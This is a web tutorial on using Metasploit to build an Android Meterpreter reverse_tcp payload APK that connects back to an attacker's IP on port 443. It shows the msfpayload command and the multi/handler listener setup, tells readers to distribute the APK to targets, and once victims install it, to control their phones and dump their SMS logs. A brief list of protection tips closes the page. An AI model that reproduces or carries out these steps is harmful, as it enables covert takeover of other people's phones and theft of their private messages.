Hacking Android Smartphone Tutorial Using Metasploit

Mobile threats are increasingly becoming wider and more complicated as smartphone users increase daily. Our tutorial for today is how to Hacking Android Smartphone Tutorial using Metasploit.

Step by Step Hacking Android Smartphone Tutorial using Metasploit


Requirements:
1. Metasploit framework, latest kali linux version recommended
2. Android smartphone, 4.0 and above recommended.

Attacker IP address: e.g 192.168.8.94
Attacker port to receive connection: 443

1. Fire up kali, Open terminal (CTRL + ALT + T)
2.  We will use the  Metasploit payload framework to create exploit.
msfpayload android/meterpreter/reverse_tcp LHOST=<attacker_ip_address> LPORT=<port_to_receive_connection>


3. After execution, it should look like the screenshot below


 Because our payload is reverse_tcp where attacker expect the victim to connect back to attacker machine, attacker needs to set up the handler to handle incoming connections to the port already specified above. Type msfconsoleto go to Metasploit console.

use exploit/multi/handler –> we will use Metasploit handler
set payload android/meterpreter/reverse_tcp –> make sure the payload is the same with step 2

4. The next step we need to configure the switch for the Metasploit payload we already specified in step 3

set lhost 192.168.8.94 –> attacker IP address
set lport 443 –> port to listen the reverse connection
exploit –> start to listen incoming connection

5. Distribute the generated apk to your targets, after your victims install it and open the application, you should get a screen like this;

You (attacker) can now do any operation with the device from your console, for example, type dump_sms to receive sms logs or camera list as show below.

Protecting yourself

  • Never install apps from unknown sources.
  • Always install an updated antivirus software on your device
  • Always view source codes of apps from unknown sources before installing.

Comments